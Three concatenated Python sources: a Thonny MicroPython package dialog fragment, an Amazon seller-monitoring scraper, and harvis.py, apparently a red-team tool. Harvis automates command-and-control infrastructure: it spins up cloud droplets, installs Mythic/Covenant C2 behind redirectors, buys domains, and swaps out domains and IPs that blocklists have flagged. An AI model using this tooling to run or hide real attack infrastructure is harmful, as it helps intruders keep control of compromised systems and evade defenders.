dirnames, filenames) in os.walk(self._current_temp_dir): if dirpath != self._current_temp_dir: paths.append(dirpath) for filename in filenames: source_path = os.path.join(dirpath, filename) paths.append(source_path) items = [] for path in paths: for item in prepare_upload_items( path, self._current_temp_dir, self._get_target_directory() ): if item not in items: items.append(item) if not items: raise RuntimeError("Could not find anything in temp directory. Was it a dummy package?") return InlineCommand("upload", items=items) def _create_python_process(self, args): proc = running.create_frontend_python_process(args, stderr=subprocess.STDOUT) return proc, proc.cmd def _on_listbox_select_package(self, name): self._start_show_module_info(name) def _start_show_module_info(self, name): self._clear_info_text() self.command_frame.grid_remove() self.title_label["text"] = tr("Module") + (" '%s'" % name) self.title_label.grid() self._set_state("fetching") self.advanced_button.grid_remove() get_workbench().bind("get_module_info_response", self._complete_display_module_info, True) get_runner().send_command(InlineCommand("get_module_info", module_name=name)) def _complete_display_module_info(self, msg): self._set_state("idle") self.current_package_data = {"info": {"name": msg.module_name}} get_workbench().unbind("get_module_info_response", self._complete_display_module_info) self._append_info_text(tr("Installed to:") + " ", ("caption",)) self._append_info_text(msg["location"] + "\n") for cb in self._checkboxes: cb.destroy() self._checkboxes.clear() for item in msg["effective_items"]: self._append_file_checkbox(item, msg["location"]) if msg["shadowed_items"]: self._append_info_text("\n") self._append_info_text(tr("Shadowed items (not importable):") + "\n", ("caption",)) for item in msg["shadowed_items"]: self._append_file_checkbox(item, None) self.command_frame.grid() self.uninstall_button.grid() self.install_button["text"] = self.get_search_button_text() self.uninstall_button["text"] = self.get_delete_selected_button_text() self.uninstall_button["state"] = "normal" if self._checkboxes else "disabled" self._select_list_item(msg.module_name) def _append_file_checkbox(self, full_path, context_dir): if context_dir: text = full_path[len(context_dir) :].strip("/") else: text = full_path if self._can_delete(full_path): cb = ttk.Checkbutton(self.info_text, text=text) var = tk.IntVar(value=1) cb.variable = var # to avoid it being gc-d cb["variable"] = var cb.full_path = full_path self._checkboxes.append(cb) self.info_text.window_create("end", window=cb) else: self._append_info_text("• " + text) self._append_info_text("\n") def _show_package_info(self, name, data, error_code=None): super(MicroPythonPipDialog, self)._show_package_info(name, data, error_code) if name.lower().startswith("micropython-"): self._set_state("fetching") self._append_info_text("\n\n") self.info_text.mark_set("wait", "end-1c") self.info_text.mark_gravity("wait", "left") self._append_info_text("Querying micropython.org, please wait...") _start_fetching_micropython_org_info(name, self._add_micropython_org_info) def _add_micropython_org_info(self, name, data, error_code=None): self._set_state("idle") self.info_text.direct_delete("wait", "end") self.info_text.mark_unset("wait") self._append_info_text("\n") if error_code == 404: self._append_info_text( tr( "Package is not available at micropython.org. " "Version at PyPI will be installed." ) ) elif error_code: self._append_info_text("Error %s\n" % error_code) self._append_info_text(data.get("error", "") + "\n") else: ver = data["info"]["version"] self._append_info_text( tr( "NB! micropython.org has published version %s of this package " "and this will be installed by default." ) % ver + "\n", ("bold",), ) self._append_info_text( "If you want to install a version from PyPI, then use the advanced install button '...'. " "Note that PyPI version may require a specific fork of MicroPython." ) def _can_delete(self, path): return not path.startswith("/usr/lib") def _get_target_directory(self): target_dir = self._backend_proxy.get_pip_target_dir() return target_dir def _read_only(self): return self._get_target_directory() is None def _show_instructions_about_existing_packages(self): self._append_info_text(tr("Upgrade or uninstall") + "\n", ("caption",)) self.info_text.direct_insert( "end", tr("For upgrading simply install the package again.") + "\n" ) self.info_text.direct_insert( "end", tr("For uninstalling delete corresponding files.") + "\n\n" ) def _show_instructions_about_installing_from_local_file(self): # not supported pass def _use_user_install(self): return False def does_support_update_deps_switch(self): return False def _show_instructions_about_target(self): self._append_info_text(tr("Scope") + "\n", ("caption",)) if isinstance(self._backend_proxy, LocalMicroPythonProxy): dir_tags = ("url",) else: dir_tags = () if len(self._backend_proxy.get_lib_dirs()) == 1: self._append_info_text(self._get_target_directory(), dir_tags) self._append_info_text("\n") else: self.info_text.direct_insert( "end", tr("This dialog lists top-level modules from following directories:\n") ) for path in self._backend_proxy.get_lib_dirs(): self._append_info_text("• ") self._append_info_text(path, dir_tags) self._append_info_text("\n") self._append_info_text("\n") self._append_info_text(tr("New packages will be installed to") + "\n") self._append_info_text("• ") self._append_info_text(self._get_target_directory(), dir_tags) self._append_info_text("\n") def _show_read_only_instructions(self): self._append_info_text(tr("Not available") + "\n", ("caption",)) if not self._get_target_directory(): reason = " (" + tr("no absolute lib directory in sys.path") + ")" else: reason = "" self.info_text.direct_insert( "end", get_not_supported_translation() + reason + "\n\n", ) def _tweak_search_results(self, results, query): if results is None: return results query = query.lower() def get_order(item): name = item["name"].lower() if name == query: return 0 elif name == "micropython-" + query: return 1 elif name == "pycopy-" + query: return 2 elif "micropython" in name: return 3 elif "pycopy" in name: return 4 elif item.get("description"): description = item["description"] if "micropython" in description.lower() or "pycopy" in description.lower(): return 5 return 6 return sorted(results, key=get_order) def _get_interpreter(self): return self._backend_proxy.get_full_label() def _get_extra_switches(self): return [] def _run_pip_with_dialog(self, args, title) -> Tuple[int, str, str]: args = ["-m", "thonny.plugins.micropython.micropip"] + args proc = running.create_frontend_python_process(args, stderr=subprocess.STDOUT) cmd = proc.cmd dlg = InstallAndUploadDialog( self, proc, back_cmd=self._create_upload_command, title="micropip", instructions=title, autostart=True, output_prelude=subprocess.list2cmdline(cmd) + "\n", ) ui_utils.show_dialog(dlg) assert dlg.returncode is not None return dlg.returncode, dlg.stdout, dlg.stderr class LocalMicroPythonPipDialog(MicroPythonPipDialog): def _get_install_command(self): return ["install", "-p", self._get_target_directory()] def _upload_installed_files(self) -> bool: "nothing to do -- micropip installed files directly to the right directory" def _delete_paths(self, paths): # assuming all files are listed if their directory is listed for path in sorted(paths, key=len, reverse=True): if os.path.isfile(path): os.remove(path) else: os.removedirs(path) def _run_pip_with_dialog(self, args, title) -> Tuple[int, str, str]: args = ["-m", "thonny.plugins.micropython.micropip"] + args proc = running.create_frontend_python_process(args, stderr=subprocess.STDOUT) cmd = proc.cmd dlg = SubprocessDialog(self, proc, "micropip", long_description=title, autostart=True) ui_utils.show_dialog(dlg) return dlg.returncode, dlg.stdout, dlg.stderr def _start_fetching_micropython_org_info(name, completion_handler): import urllib.error import urllib.parse # Fetch info from PyPI url = MICROPYTHON_ORG_JSON % urllib.parse.quote(name) url_future = _fetch_url_future(url) def poll_fetch_complete(): import json if url_future.done(): try: _, bin_data = url_future.result() raw_data = bin_data.decode("UTF-8") completion_handler(name, json.loads(raw_data), None) except urllib.error.HTTPError as e: completion_handler( name, {"info": {"name": name}, "error": str(e), "releases": {}}, e.code ) else: tk._default_root.after(200, poll_fetch_complete) poll_fetch_complete() class InstallAndUploadDialog(InlineCommandDialog): def __init__( self, master, proc, back_cmd, title, instructions=None, output_prelude=None, autostart=True ): self._stage = "install" self._proc = proc super().__init__( master, back_cmd, title, instructions=instructions, output_prelude=output_prelude, autostart=autostart, ) def start_work(self): threading.Thread(target=self.work_in_thread, daemon=True).start() def work_in_thread(self): self.set_action_text("Installing to temp directory") self.append_text("Installing to temp directory\n") while True: line = self._proc.stdout.readline() if not line: break self.append_text(line) self.set_action_text_smart(line) self.returncode = self._proc.wait() if self.returncode: self.set_action_text("Error") self.append_text("\nmicropip returned with error code %s\n" % self.returncode) else: self.set_action_text("Copying to the device") self.append_text("Copying to the device\n") self.report_done(self.returncode == 0) def on_done(self, success): if not success or self._stage == "upload": super().on_done(success) if self._stage == "upload": # Returcode is required by the superclass if success: self.returncode = 0 else: self.returncode = -1 return assert self._stage == "install" # only half of the work is done self._stage = "upload" super().send_command_to_backend()
monitor.py
import threading import time from random import choice from selenium import webdriver from modules.amazon import amazon from modules.cache import get_cache from modules.cache import save_cache def create_browser(headless : bool, proxy = None): options = webdriver.FirefoxOptions() if(proxy): webdriver.DesiredCapabilities.FIREFOX["proxy"] = { "httpProxy": proxy, "ftpProxy": proxy, "sslProxy": proxy, "proxyType": "MANUAL", } if(headless): options.add_argument("--headless") print("Monitor starting using proxy: {}".format(proxy)) return webdriver.Firefox(None, options=options) class monitor: def __init__(self, headless : bool, interval : float, product : str, proxies = None): proxy = None if(proxies): proxy = choice(proxies) self.browser = create_browser(headless, proxy) self.update_interval = interval or 60 self.product_id = product self._events = { "seller_added": [], "seller_removed": [], "update": [self.__on_update], } self.__closed = False try: t = threading.Thread(target=self.update) print("Monitor successfully started.") #t.daemon = True t.start() while True: time.sleep(100) except (KeyboardInterrupt, SystemExit): print("Received keyboard interrupt, quitting threads!") self.__closed = True def update(self): amzon = amazon(self.browser) while(self.product_id is not None): if(self.__closed): self.browser.close() break print("Running") product_id = self.product_id thumbnail = None url = None name = None product_data = None cache = get_cache(product_id) if(cache): thumbnail = cache["thumbnail"] url = cache["url"] name = cache["product_name"] if(not name): product_data = amzon.get_product(product_id) data = { "product_id": product_id, "product_name": name or product_data["name"], "url": url or amzon.product_link_from_id(product_id), "price": None, "thumbnail": thumbnail or product_data["thumbnail"], "sellers": [] } data["sellers"] = amzon.get_sellers(product_id) self.trigger("update", data) time.sleep(self.update_interval) # Self note: __ makes a function private def __on_update(self, data, removeLater = None): product_id = data["product_id"] cache_data = get_cache(data["product_id"]) if(not cache_data): save_cache(product_id, data) else: for seller in data["sellers"]: if(not seller in cache_data["sellers"]): self.trigger("seller_added", seller, data) for seller in cache_data["sellers"]: if(not seller in data["sellers"]): self.trigger("seller_removed", seller, data) save_cache(product_id, data) # Event programming def on(self, event_name : str, callback : any): if(event_name in self._events): self._events[event_name].append(callback) # TO DO: # Improve argument passing def trigger(self, event_name : str, args = None, product = None): if(event_name in self._events): event = self._events[event_name] for callback in event: callback(args, product)
harvis.py
import requests import time from colors import bcolors import threading import random import json import os import subprocess import sys from os import chmod from Crypto.PublicKey import RSA import logging import paramiko import config from threading import Thread from namecheap import Api import redirect_setup import c2_setup import apivoid_handler import namecheap_handler import backup_handle import backup import json log = {} message_queu = {} #action 1 = redirector issue #action 2 = c2 issue #aciont 3 = domain pool issue #action 4 = API Void credit issue domains_types = {} domains = [] domains_in_use = [] api = None #api object #temporary list to keep droplets #waiting for migration temp_c2_list = {} temp_redirects = {} burned_domains = [] redirects = {} c2_list = {} found_keys = [] digital_ocean_token = config.digital_ocean_token threads = [] req_number = 0 backup_restored = False c2_mythic = 1 c2_covenant = 2 key_gb = "" def set_droplets_key(): global key_gb key = RSA.generate(2048) with open(os.getcwd() +"/private.pem", 'wb') as content_file: chmod(os.getcwd() +"/private.pem", 0o600) content_file.write(key.exportKey('PEM')) pubkey = key.publickey() with open(os.getcwd() +"/private.key", 'wb') as content_file: content_file.write(pubkey.exportKey('OpenSSH')) f_pb_key = open(os.getcwd() +"/private.key", "r") public_key = f_pb_key.read() f_pb_key.close() id_droplet_gb = "" #you have to get the image_id of your snapshot already configured to work as a proxy create_ssh_key = "curl -X POST -H 'Content-Type: application/json' -H 'Authorization: Bearer "+digital_ocean_token+"' -d '{\"name\":\"Harvis\",\"public_key\":\""+str(public_key)+"\"}' \"https://api.digitalocean.com/v2/account/keys\"" result_creation_keys = subprocess.Popen(create_ssh_key, shell=True, stdout=subprocess.PIPE).stdout key = result_creation_keys.read() key_dict = json.loads(key) key_gb = str(key_dict["ssh_key"]["id"]) def kill_process_like(command): os.system("pkill -f \"ssh -o\"") def generate_image_from_snapshot(key_gb): key_gb = str(key_gb) worked = False while worked == False: try: headers = { 'Content-Type': 'application/json', 'Authorization': 'Bearer '+digital_ocean_token, } data = '{"name":"Harvis","region":"nyc1","size":"s-2vcpu-2gb","image":"ubuntu-20-04-x64","ssh_keys":['+key_gb+'],"backups":false,"ipv6":true,"user_data":null,"private_networking":null,"volumes": null,"tags":["'+config.username+'"]}' response = requests.post('https://api.digitalocean.com/v2/droplets', headers=headers, data=data) status = response.status_code while status != 202: response = requests.post('https://api.digitalocean.com/v2/droplets', headers=headers, data=data) status = response.status_code time.sleep(2) worked = True except Exception as e: time.sleep(3) return response.content def get_droplet(id_droplet): headers = { 'Content-Type': 'application/json', 'Authorization': 'Bearer '+digital_ocean_token, } response = requests.get('https://api.digitalocean.com/v2/droplets/'+str(id_droplet), headers=headers) status = response.status_code while status != 200: response = requests.get('https://api.digitalocean.com/v2/droplets/' + str(id_droplet), headers=headers) status = response.status_code time.sleep(2) return response.content def del_droplet(id_droplet): id_droplet = int(id_droplet) headers = { 'Content-Type': 'application/json', 'Authorization': 'Bearer '+digital_ocean_token, } response = requests.delete('https://api.digitalocean.com/v2/droplets/' + str(id_droplet), headers=headers) status = response.status_code while status != 204: response = requests.delete('https://api.digitalocean.com/v2/droplets/'+str(id_droplet), headers=headers) status = response.status_code time.sleep(2) def del_ssh(id_key): headers = { 'Content-Type': 'application/json', 'Authorization': 'Bearer '+digital_ocean_token, } response = requests.delete('https://api.digitalocean.com/v2/account/keys/'+str(id_key), headers=headers) status = response.status_code while status != 204: response = requests.delete('https://api.digitalocean.com/v2/account/keys/'+str(id_key), headers=headers) status = response.status_code time.sleep(2) def status_response(droplet): dict = json.loads(droplet) status = dict["droplet"]["status"] if 'active' in status: return True else: return False def ip_response(droplet, id_droplet): dict = json.loads(droplet) worked = False while worked == False: try: headers = { 'Content-Type': 'application/json', 'Authorization': 'Bearer ' + digital_ocean_token, } resp = requests.get('https://api.digitalocean.com/v2/droplets/' + str(id_droplet), headers=headers) resp_content = resp.content parsed = json.loads(resp_content) while not parsed["droplet"]["networks"]["v4"]: resp = requests.get('https://api.digitalocean.com/v2/droplets/' + str(id_droplet), headers=headers) resp_content = resp.content parsed = json.loads(resp_content) for i in parsed["droplet"]["networks"]["v4"]: if i["type"] == "public": ip = i["ip_address"] worked = True except Exception as e: time.sleep(3) print(e) return ip def id_response(droplet): dict = json.loads(droplet) id = dict["droplet"]["id"] return id def connect_to_new_droplet(dropletip): remote_user = 'root' remote_host = dropletip remote_port = 22 local_host = '127.0.0.1' local_port = 9092 ssh_private_key = os.getcwd() +"private.key" out = "Connection refused" err = "" while "Connection refused" in out or "Connection refused" in err or "Connection reset" in out or "Connection reset" in err or "Could not resolve hostname" in err or "Could not resolve hostname" in out or "No such" in out: try: remote_host = dropletip out = "" err = "" ssh_connect = "ssh -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no -D " + str( local_port) + " -Nf -i " + ssh_private_key + " " + remote_user + "@" + str(remote_host) proc1 = subprocess.Popen(ssh_connect, shell=True) out, err = proc1.communicate() if out == None: out = "" if err == None: err = "" time.sleep(1) try: if "Address already in use" in out: ssh_kill = "ssh -o" kill_process_like(ssh_kill) except Exception as msg: out = msg except Exception as e: print(e) def create_new_droplet(type,type_droplet): global c2_list, redirects,key_gb result_creation = generate_image_from_snapshot(key_gb) id_droplet = id_response(result_creation) ip_droplet = ip_response(result_creation, id_droplet) droplet = {"id": id_droplet, "ip": ip_droplet, "state":"ok"} if type_droplet == 1: redirects[type] = droplet if type_droplet == 2: c2_list[type] = droplet if type_droplet == 3: #temp redirect temp_redirects[type] = droplet if type_droplet == 4: #temp c2 temp_c2_list[type] = droplet def delete_remaining_infra(key_gb): headers = { 'Content-Type': 'application/json', 'Authorization': 'Bearer ' + digital_ocean_token, } response = requests.get('https://api.digitalocean.com/v2/droplets?tag_name='+config.username, headers=headers) remaining_droplets = json.loads(response.text)["droplets"] for i in remaining_droplets: del_droplet(i["id"]) def check_pool(): global domains domains = set(domains) - set(burned_domains) if len(domains) < 3: full_message = "Running out of Domains! Make sure to purchase more domains" message_queu["action4"].append({"message":full_message}) def check_credits(): if float(apivoid_handler.estimated_queries.replace(",",".")) < 50: full_message = "You are running out of credits! Buy more APIVoid credits to avoid interruptions" message_queu["action3"].append({"message": full_message}) def check_haul_pools(): for i in domains_types: if len(domains_types[i]) < 3: full_message = "Running out of domains at haul: "+str(i) message_queu["action5"].append({"message": full_message,"haul":i}) def first_creation(type, type_droplet): create_new_droplet(type, type_droplet) def config_droplet(type, type_connect,c2_type): logger = paramiko.util.logging.getLogger() hdlr = logging.FileHandler('app.log') formatter = logging.Formatter('%(asctime)s %(levelname)s %(message)s') hdlr.setFormatter(formatter) logger.addHandler(hdlr) logger.setLevel(logging.INFO) worked = False while worked == False: try: ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) path = os.getcwd() k = paramiko.RSAKey.from_private_key_file(path +'/private.pem') if type_connect == 1: ip = redirects[type]['ip'] ssh.connect(ip, username='root', pkey=k) worked = True print("Configuring redirector") redirect_setup.install_redir(ssh) print("Setting SSL certificates... this might take a while...") print("Waiting DNS propagations! We will check every hour") domain = "" #TO-DOs make possible to add more types of haul domain = domains_types[type].pop() domains_in_use.append(domain) redirects[type]["domain"] = domain redirect_setup.setDNSInfo(domain,redirects[type]["ip"]) while redirect_setup.check_propagation(ssh, c2_list, redirects, type, domain, k, ip) == False: time.sleep(900) ssh.close() ssh_work = False while ssh_work == False: try: ssh.connect(ip, username='root', pkey=k) ssh_work = True except Exception as e: print(e) redirect_setup.full_setup(ssh, c2_list, redirects, type, domain, k, ip) ssh.close() print("Redirectors Set") if type_connect == 2: print("Setting C2's") ip = c2_list[type]['ip'] ssh.connect(ip, username='root', pkey=k) worked = True c2_setup.install_c2(ssh,c2_type) password = c2_setup.setup_api(ssh,ip,c2_type) c2_list[type]['password'] = password print("API KEY set") print("Setting Certificates") c2_setup.setup_certificate(ssh,type) print("Setting Listener Profile") c2_setup.setup_listener(ip,type,c2_type) print("All Profiles Set") print("You are ready to go. This is your infrastructure:") show_infra() c2_setup.firewall_rules(ssh) #run command if type_connect == 3: ip = temp_redirects[type]['ip'] ssh.connect(ip, username='root', pkey=k) worked = True print("Configuring Temporary redirector") redirect_setup.install_redir(ssh) print("Setting SSL certificates... this might take a while...") print("Waiting DNS propagations! We will check every hour") domain = "" #TO-DOs make possible to add more types of haul domain = domains_types[type].pop() domains_in_use.append(domain) temp_redirects[type]["domain"] = domain redirect_setup.setDNSInfo(domain,temp_redirects[type]["ip"]) while redirect_setup.check_propagation(ssh, c2_list, temp_redirects, type, domain, k, ip) == False: time.sleep(900) ssh.close() ssh_work = False while ssh_work == False: try: ssh.connect(ip, username='root', pkey=k) ssh_work = True except Exception as e: print(e) redirect_setup.full_setup(ssh, c2_list, temp_redirects, type, domain, k, ip) ssh.close() print("Redirectors Set") if type_connect == 4: print("Setting Temporary C2's") ip = temp_c2_list[type]['ip'] ssh.connect(ip, username='root', pkey=k) worked = True c2_setup.install_c2(ssh,c2_type) c2_setup.setup_api(ssh, ip,c2_type) print("API KEY set") print("Setting Listener Profile") c2_setup.setup_listener(ip,type,c2_type) print("All Profiles Set") print("You are ready to go. This is your infrastructure:") show_infra() c2_setup.firewall_rules(ssh) #run command except Exception as err: print(err) time.sleep(10) logging.debug(err) logging.info('Error connecting to Host') full_message = "Error in Droplet creation: "+str(err) message_queu["action6"].append({"message": full_message}) def update_operation(domains_brn, c2_brn, redirects_brn, domains_in_use, c2_list, redirects): #check all burned domains, c2 ips, redirect ips if bool(domains_brn): full_message = "" for i in domains_brn: full_message = full_message +"[+] Domain burned: "+i["domains"] +"\n" for j in i["blacklist_list"]: full_message = full_message +"\t Caught by: "+j["engine"]+". Reference: "+j["reference"] +"\n" object_burned = "" for k in redirects: if redirects[k]["domain"] == i["domains"]: object_burned = redirects[k] if object_burned not in burned_domains: burned_domains.append(redirects[k]["domain"]) message_already_in = False if object_burned: for m in message_queu["action1"]: if m["droplet"]["ip"] == object_burned["ip"]: message_already_in = True if message_already_in == False: message_queu["action1"].append({"message":full_message, "droplet":object_burned}) #avoid adding same message multiple times """ if bool(c2_brn): full_message = "" for i in c2_brn: full_message = full_message + "[+] C2 IP's burned: "+i["ips"] for j in i["blacklist_list"]: full_message = full_message + "\t Caught by: "+j["engine"]+". Reference: "+j["reference"] object_burned = "" for k in c2_list: if c2_list[k]["ip"] == i["ips"]: object_burned = c2_list[k] message_queu["action2"].append({"message":full_message, "droplet":object_burned}) """ if bool(redirects_brn): full_message = "" for i in redirects_brn: full_message = full_message + "[+] Redirector IP's burned: "+i["ips"] for j in i["blacklist_list"]: full_message = full_message + "\t Caught by: "+j["engine"]+". Reference: "+j["reference"] object_burned = "" for k in redirects: if redirects[k]["ip"] == i["ips"]: object_burned = redirects[k] message_queu["action1"].append({"message":full_message, "droplet":object_burned}) check_pool()#check if domain pool is running out of domains check_credits()#check if credits are ending apivoid check_haul_pools()#check if haul pools are running out of domains def set_and_check(): global domains_brn, c2_brn, redirects_brn, domains_in_use, c2_list, redirects,c2_mythic, domains, domains_types, burned_domains,temp_c2_list,temp_redirects,log,message_queu,key_gb if(backup_restored == True): #create redirectors for i in config.names: first_creation(i,1) #create c2s for i in config.names: first_creation(i,2) #setup redirectors for i in config.names: config_droplet(i,1,0) for i in config.names: config_droplet(i,2,0) while True: domains_brn = apivoid_handler.check_burned_domain(domains_in_use) c2_brn = apivoid_handler.check_burned_c2_list(c2_list) redirects_brn = apivoid_handler.check_burned_redirectors(redirects) backup_handle.save_backup(domains_types, domains, burned_domains,temp_c2_list, temp_redirects, redirects, c2_list, domains_in_use, log, message_queu,key_gb) update_operation(domains_brn, c2_brn, redirects_brn, domains_in_use, c2_list, redirects) time.sleep(config.check_infra_state) message_queu_print() def damaged_components(): print("[+] You have components burned") for i in domains_types: if len(domains_types[i]) == 0: print("You have no domains in the "+i+" haul pool.") print("Make sure to add at least 1 domain in the haul pool before migrating.") return print("[+] Choose component to Migrate [0 = ALL]") if len(message_queu["action1"]) > 0 or len(message_queu["action2"])>0: #find redirectors burned first redirects_tmp_list = [] c2_tmp_list = [] for i in message_queu["action1"]: redirects_tmp_list.append(i["droplet"]["ip"]) for i in message_queu["action2"]: c2_tmp_list.append(i["droplet"]["ip"]) #tag components with burned for i in redirects: if redirects[i]["ip"] in redirects_tmp_list: redirects[i]["state"] = "burned" for i in c2_tmp_list: if c2_tmp_list[i]["ip"] in c2_tmp_list: c2_tmp_list[i]["state"] = "burned" for index,key in enumerate(redirects): redirect_str = "" c2_str = "" if redirects[key]["state"] == "burned": redirect_str = str(index+1) +f") [BURNED]" if c2_list[key]["state"] == "burned": c2_str = str(index+1+len(redirects)) + ") [BURNED]" print("Redirect: "+redirects[key]["ip"] +f" {bcolors.WARNING}"+redirect_str +f"{bcolors.ENDC}>>>>>>> C2: " +c2_list[key]["ip"] +c2_str) component = input("Component: ") print(f"{bcolors.WARNING}This will create a temporary droplet to replace the damaged component. Do you want yo continue?{bcolors.ENDC} {bcolors.BOLD}[Y\\n]{bcolors.ENDC}") option = input() option = option.lower() if option == "y": if int(component) == 0: for i in message_queu["action1"][:]: for k in redirects: if redirects[k]["ip"] == i["droplet"]["ip"]: redirects[k]["state"] = "pending_kill" first_creation(k, 3) config_droplet(k,3,0) first_creation(k, 4) config_droplet(k, 4, 0) message_queu["action1"].remove(i) message_queu["action7"].append( {"message": "Temporary Droplet Ready. Pending discard.", "droplet": i}) for i in message_queu["action2"][:]: for k in c2_list: if c2_list[k]["ip"] == i["droplet"]["ip"]: c2_list[k]["state"] = "pending_kill" first_creation(k, 4) config_droplet(k,4,0) message_queu["action2"].remove(i) message_queu["action7"].append( {"message": "Temporary Droplet Ready. Pending discard.", "droplet": i}) else: if int(component) > len(redirects): key_list = list(c2_list) component_key = key_list[int(component) - 1] c2_list[component_key]["state"] = "pending_kill" comp_mod_ip = c2_list[component_key]["ip"] first_creation(component_key, 4) config_droplet(component_key, 4, 0) for i in message_queu["action1"][:]: if i["droplet"]["ip"] == comp_mod_ip: message_queu["action7"].append({"message":"Temporary Droplet Ready. Pending discard.","droplet":i}) message_queu["action1"].remove(i) else: key_list = list(redirects) component_key = key_list[int(component)-1] redirects[component_key]["state"] = "pending_kill" comp_mod_ip = redirects[component_key]["ip"] first_creation(component_key,3) config_droplet(component_key, 3, 0) c2_list[component_key]["state"] = "pending_kill" c2_mod_ip = c2_list[component_key]["ip"] first_creation(component_key,4) config_droplet(component_key,4,0) for i in message_queu["action1"][:]: if i["droplet"]["ip"] == comp_mod_ip: message_queu["action7"].append({"message":"Temporary Droplet Ready. Pending discard.","droplet":i}) message_queu["action1"].remove(i) #get component modified from message_queue #remove from message_queue #add pending_kill to message queue else: pass def discard_components(): print("[+] You have components pending discards") print("[+] Choose component to Discard [0 = ALL]") if len(message_queu["action7"]): # find components to discard components_temp = [] for i in message_queu["action7"]: components_temp.append(i["droplet"]["droplet"]["ip"]) for index, key in enumerate(redirects): redirect_str = "" c2_str = "" if redirects[key]["state"] == "pending_kill": redirect_str = str(index + 1) + ") [PENDING DISCARD]" if c2_list[key]["state"] == "pending_kill": c2_str = str(index + 1 + len(redirects)) + ") [PENDING DISCARD]" print("Redirect: " + redirects[key]["ip"] + f" {bcolors.WARNING}"+redirect_str + f"{bcolors.ENDC}>>>>>>>" + c2_list[key]["ip"] + c2_str) component = input("Component: ") print("Before discarding a component, make sure to migrate your agents to the new droplet.") print(f"{bcolors.WARNING}Do you want to continue?[Y\\n] [This will kill all agents in the discarded component] {bcolors.ENDC}") option = input() option = option.lower() if option == "y": if int(component) == 0: for i in message_queu["action1"][:]: for k in redirects: if redirects[k]["ip"] == i["droplet"]["ip"]: message_queu["action7"].remove(i) del_droplet(redirects[k]["id"]) del_droplet(c2_list[k]["id"]) redirects[k] = temp_redirects[k] c2_list[k] = temp_c2_list[k] temp_redirects.pop(k, None) temp_c2_list.pop(k, None) for i in message_queu["action2"][:]: for k in c2_list: if c2_list[k]["ip"] == i["droplet"]["ip"]: message_queu["action7"].remove(i) del_droplet(c2_list[k]["id"]) c2_list[k] = temp_c2_list[k] temp_c2_list.pop(k, None) else: if int(component) > len(redirects): key_list = list(c2_list) component_key = key_list[int(component) - 1] comp_mod_ip = c2_list[component_key]["ip"] for i in message_queu["action7"][:]: if i["droplet"]["ip"] == comp_mod_ip: message_queu["action7"].remove(i) del_droplet(c2_list[component_key]["id"]) c2_list[component_key] = temp_c2_list[component_key] temp_c2_list.pop(component_key, None) else: key_list = list(redirects) component_key = key_list[int(component) - 1] comp_mod_ip = redirects[component_key]["ip"] for i in message_queu["action7"][:]: if i["droplet"]["droplet"]["ip"] == comp_mod_ip: message_queu["action7"].remove(i) del_droplet(redirects[component_key]["id"]) del_droplet(c2_list[component_key]["id"]) redirects[component_key] = temp_redirects[component_key] c2_list[component_key] = temp_c2_list[component_key] temp_redirects.pop(component_key, None) temp_c2_list.pop(component_key, None) # get component modified from message_queue # remove from message_queue # add pending_kill to message queue else: pass def show_infra(): for i in redirects: print("Redirect: "+redirects[i]["ip"]+ " >>>>>>> "+"C2: "+c2_list[i]["ip"], "Credentials: mythic_admin/"+c2_list[i]["password"]) def set_apis(): print("Choose API Key to set: ") print("1) Digital Ocean") print("2) Namecheap") print("3) APIVoid") option = input("Option: ") if int(option) == 1: api = input("Api key: ") config.digital_ocean_token = api if int(option) == 2: api = input("Api key: ") config.namecheap_key = api if int(option) == 3: api = input("Api key: ") config.apivoid_key = api def kill_all(): print("This will kill all your droplets and exit. Do you want to continue? [Y\\n]") option = input() option = option.lower() if option == "y": for i in redirects: del_droplet(i["id"]) for i in c2_list: del_droplet(i["id"]) else: pass def message_queu_print(): if "action1" in message_queu: for i in message_queu["action1"]: print(i["message"]) if "action2" in message_queu: for i in message_queu["action2"]: print(i["message"]) if "action3" in message_queu: for i in message_queu["action3"][:]: print(i["message"]) message_queu["action3"].remove(i) if "action4" in message_queu: for i in message_queu["action4"][:]: print(i["message"]) message_queu["action4"].remove(i) if "action5" in message_queu: for i in message_queu["action5"][:]: print(i["message"]) message_queu["action5"].remove(i) if "action6" in message_queu: for i in message_queu["action6"][:]: print(i["message"]) message_queu["action6"].remove(i) if "action7" in message_queu: for i in message_queu["action7"]: print(i["message"]) def check_backup(): global domains_brn, c2_brn, redirects_brn, domains_in_use, c2_list, redirects, c2_mythic, domains, domains_types, burned_domains, temp_c2_list, temp_redirects, log, message_queu, key_gb if backup.backup_saved == 1: bkp = backup_handle.recover_backup() domains_types = bkp[0] domains = bkp[1] burned_domains = bkp[2] temp_c2_list = bkp[3] temp_redirects = bkp[4] redirects = bkp[5] c2_list = bkp[6] domains_in_use = bkp[7] log = bkp[8] message_queu = bkp[9] key_gb = bkp[10] apivoid_handler.get_estimated_queries() return False else: delete_remaining_infra(key_gb) set_droplets_key() return True def menu(): global api, domains_types,domains,burned_domains,temp_c2_list,temp_redirects,redirects,c2_list,domains_in_use,log,message_queu while True: backup_handle.save_backup(domains_types, domains, burned_domains,temp_c2_list, temp_redirects, redirects, c2_list, domains_in_use, log, message_queu, key_gb) print("[+] Choose an option:") print("1) Buy domain") print("2) Move domain to a haul") print("3) Remove domain from haul") print("4) Move priority of domains in haul") print("5) Print Domains") situational_message_6 = "[No pending migrations]" if len(message_queu["action1"]) > 0 or len(message_queu["action2"])> 0: situational_message_6 = f"{bcolors.WARNING}You have burned domains/c2's/redirectors{bcolors.ENDC}" print(f"6) Pending Migrations "+situational_message_6) situational_message_7 = "[No pending discards]" if len(message_queu["action7"]) > 0: situational_message_7 = f"{bcolors.WARNING}[You have pending discards for domains/c2's/redirectors] {bcolors.ENDC}" print(f"7) Pending Discards "+situational_message_7) print("8) Show Infra") try: command = input("Select: ") if command == '1': print("0) Back") domain_name = input("Insert domain name: ") if domain_name.strip() != "0": result_call = namecheap_handler.buy_domain(domain_name) if result_call == False: print("[+] Domain not available") else: print("[+] Domain successfuly acquired") if command == '2': print("[+] Select Domains to move to a haul: ") actual_domains = set(domains) - set(domains_in_use) - set(burned_domains) if len(actual_domains) > 0: for index, item in enumerate(actual_domains): print(str(index) + ") "+item) print("1000) Back") domain_option = input("Option: ") if domain_option != "1000": for i in domains_types: if domain_option in i: print("[-] Domain is already in Haul: "+i) print("[-] Remove that domain from the haul to allow moving it") else: print("Select Haul to move: ") for j in config.names: print("[+] "+j) haul_option = input("Option: ") actual_domains = list(actual_domains) 